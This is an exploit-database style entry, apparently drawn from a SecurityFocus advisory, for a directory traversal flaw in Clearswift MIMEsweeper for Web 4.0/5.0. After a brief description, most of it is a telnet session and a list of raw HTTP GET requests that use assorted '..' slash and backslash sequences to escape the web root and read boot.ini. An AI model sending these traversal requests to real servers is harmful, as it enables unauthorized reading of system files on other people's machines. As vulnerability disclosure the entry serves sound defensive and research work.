clearswift MIMEsweeper for Web 4.0/5.0 - Directory Traversal

Author: Kroma Pierre
type: remote
platform: windows
port: 
date_added: 2004-07-11 
date_updated: 2013-01-24 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/10918/info

Clearswift MIMEsweeper For Web is reported prone to a directory traversal vulnerability due to insufficient sanitization of user-supplied data.

To carry out an attack an attacker may specify a relative path to a target file in a GET request to the vulnerable server, directory traversal character sequences may be supplied as a part of the request to escape the web root.

telnet www.example.com 80
Trying www.example.com...
Connected to www.example.com.
Escape character is '^]'.
GET /ca/..\\..\\..\\..\\..\\..\\boot.ini HTTP/1.0

GET /foobar/..\\..\\..\\..\\boot.ini HTTP/1.0
GET /foobar/..\..\..\..\..\..\\boot.ini HTTP/1.0
GET /foobar/..\..\..\..\..\..\boot.ini HTTP/1.0
GET /foobar/\..\..\..\..\..\boot.ini HTTP/1.0
GET /foobar//..\\..\\..\\..\\boot.ini HTTP/1.0
GET /foobar//..\\..//..\\..//boot.ini HTTP/1.0
GET /foobar/\../\../\../\../\boot.ini HTTP/1.0
GET /foobar/../../../../boot.ini HTTP/1.0
GET /foobar\..\..\..\..\boot.ini HTTP/1.0